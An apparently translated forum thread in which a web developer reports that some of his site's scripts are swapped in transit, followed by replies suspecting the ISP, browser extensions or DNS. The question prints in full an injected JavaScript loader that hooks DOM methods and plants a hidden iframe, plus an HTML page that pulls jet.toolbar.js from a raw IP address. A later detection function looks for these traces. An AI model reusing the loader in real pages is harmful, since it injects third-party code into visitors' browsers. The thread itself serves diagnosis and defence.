JavaScript
astler, 2015-08-22 18:12:24

Where does the extraneous JavaScript, JetToolbar.js, come from on websites?

In general, I sit, I don't touch anyone, I make a website. And then I see that errors constantly appear in the Chrome console. I go to look and see what is there. Periodically, the browser requests a page from my site with the address /gA0LNt_i5b9Q.html. Interesting, I didn't post such links anywhere. I see that the request for this page comes from a script. I open the script and see that it contains not at all the code that should be there. I decided that viruses had started up somewhere here, and began my mini-research. In general, after all the checks, it turned out that everything was clean on my side, both on the web server and on all computers. In addition, it turned out that scripts are being replaced not only on my site, which I develop, but also on other sites. It's just that with some degree of probability (say less than 1%), instead of the original script, a script with different content is loaded (here, for example, is what was loaded instead of the script platform.twitter.com/widgets.js on one site):

(function(a, b, c) {
    var d = "script",
        e = "src",
        f = b.location,
        g = function(a) {
            return b.getElementsByTagName(a)
        }, h = g(d),
        i = h.length;
    if ("loading" == b.readyState & i > 0 & c == h[h.length - 1].src && b.write('<script type="text/javascript" src="' + c + '?r=1"></script>'), g(d).length == i) {
        var j = -1,
            k = b.createElement(d);
        k.src = c + "?r=2", k.type = "text/javascript";
        for (j in h) {
            if ("string" == typeof h[j].src && h[j].src == c) {
                var l = h[j].nextSibling;
                l ? h[j].parentNode.insertBefore(k, l) : h[j].parentNode.appendChild(k)
            }
            break
        }
        k.parentNode || g("head")[0].appendChild(k)
    }
    if (!a.jTB & a == a.top) {
        var m = b.write;
        b.write = function() {
            var a = m.apply(this, arguments);
            return a
        };
        var n = b.createElement;
        b.createElement = function() {
            var a = arguments,
                b = n.apply(this, a);
            try {
                if (b.getAttribute) {
                    var c = b.setAttribute;
                    1 == a.length && a[0].toLowerCase() == d && (Object.defineProperty && Object.defineProperty(b, e, {
                        set: function() {
                            this.setAttribute(e, arguments[0])
                        },
                        get: function() {
                            return b.getAttribute(e)
                        }
                    }), b.setAttribute = function() {
                        var a = arguments;
                        return 2 == a.length && a[0] == e && a[1].indexOf(".js") == a[1].length - 3 && (a = [e, a[1] + "?r=4"]), c.apply(this, a)
                    })
                }
            } catch (f) {}
            return b
        };
        var o = function() {
            var a = g("body")[0];
            if (a) {
                var c = b.createElement("iframe");
                c.src = f.protocol + "//" + f.hostname + (f.port ? ":" + f.port : "") + "/gA0LNt_i5b9Q.html", c.name = document.domain;
                var d = c.style,
                    e = b.createElement("div"),
                    h = e.style;
                h.position = "fixed", d.overflow = "hidden", d.border = h.left = h.bottom = 0, d.width = d.height = h.width = h.height = "1px", e.appendChild(c), a.appendChild(e)
            } else setTimeout(o, 50)
        };
        o(), a.jTB = 1
    }
})(window, document, "http://platform.twitter.com/widgets.js");

In general, instead of widgets.js (in this case; different scripts are replaced each time), a script is loaded that adds an iframe and then loads the script we actually need. Because there is no such page on the server (/gA0LNt_i5b9Q.html), an error message appears in the browser console.
Further, it gets more interesting. It turned out that sometimes this link still works (rarely), and platform.twitter.com/gA0LNt_i5b9Q.html gives us this HTML code (again, the server may be different, it all depends on which script was replaced; only the page, /gA0LNt_i5b9Q.html, does not change):
<html>
  <head>
    <script type='text/javascript'>
      if (window.name != document.domain) {
        document.domain = window.name;
      }
    </script>
    <script src = 'http://86.57.252.165:8082/jet.toolbar/jet.toolbar.js?ver=latest&jet-toolbar-cmds=ifrun:1' type='text/javascript'></script>
  </head>
  <body></body>
</html>

Well, then off we go, that jet.toolbar.js script pulls a bunch of scripts along with it.
The question is - what is this jet.toolbar.js and how to deal with it? And the cat is to blame? This is my ISP having so much fun, if I understand correctly?
PS I googled JetToolbar - I came across such a presentation ciscoconnect.ru/en/system/files/jettoolbar_i_subsc...
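
The side effects of the loader quoted in the question can be checked for from the page itself. The following is an added example, not part of the original post; the function names are hypothetical, and `win`/`doc` stand for the page's `window` and `document`.

```javascript
// Added example: looks for the traces the injected loader leaves in a page.
// win/doc are passed in so the check can also run against constructed stand-ins.
function isNative(fn) {
  return typeof fn === "function" &&
    /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

function findLoaderTraces(win, doc) {
  const findings = [];

  // 1. The loader sets window.jTB = 1 so that it only runs once per page.
  if (win.jTB) findings.push("marker: window.jTB is set");

  // 2. It replaces document.write and document.createElement with wrappers.
  for (const name of ["write", "createElement"]) {
    if (!isNative(doc[name])) findings.push("hooked: document." + name);
  }

  // 3. It appends a 1px iframe whose name is document.domain and whose src
  //    is a root-level .html page on the site's own origin.
  const origin = win.location.protocol + "//" + win.location.host;
  for (const frame of Array.from(doc.getElementsByTagName("iframe"))) {
    const src = String(frame.src || "");
    const tiny = frame.style &&
      frame.style.width === "1px" && frame.style.height === "1px";
    const rootHtml = src.startsWith(origin + "/") &&
      /^\/[^\/?#]+\.html$/i.test(src.slice(origin.length));
    if (tiny && rootHtml && frame.name === doc.domain) {
      findings.push("iframe: " + src);
    }
  }

  // 4. Script URLs it reloads carry a ?r=1, ?r=2 or ?r=4 suffix.
  for (const s of Array.from(doc.getElementsByTagName("script"))) {
    const src = String(s.src || "");
    if (/\.js\?r=[124]$/.test(src)) findings.push("reloaded script: " + src);
  }
  return findings;
}
```

In a browser console, call `findLoaderTraces(window, document)`. Other libraries and extensions also wrap these DOM methods, so a lone "hooked" finding is only a hint, while the iframe and the `jTB` marker are specific to this loader.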


5 answer(s)
Markety, 2015-08-24
@markety

On one of my sites in the logs I see the same thing. Requests to the gA0LNt_i5b9Q.html page come from the Beltelecom network. I compare with this information - 42.tut.by/450791
Perhaps this is the answer.

Xius, 2016-07-29
@Xius

Thank you for posting your investigation! Today I looked at the web browser in the metric and also saw that one user with a Yandex browser was hitting the /gA0LNt_i5b9Q.html page almost after every transition.
I couldn't think of anything better than to create such a page on the site with a warning text for the user: gadgetbox.kz/ga0lnt_i5b9q
Perhaps the issue is with the provider.

index0h, 2015-08-22
@index0h

It looks like a traffic substitution, or the work of browser extensions. Recently I saw a browser extension trying to sell itself as a protection for Kaspersky, but in fact - it turned off adblock + mixed its shit into the DOM.

Mystray, 2015-08-23
@Mystray

Check the DNS settings on the router, if one is used. If everything is fine there, try, as mentioned above, to change the provider.

zKey, 2018-03-15
@zKey

We have such technology.
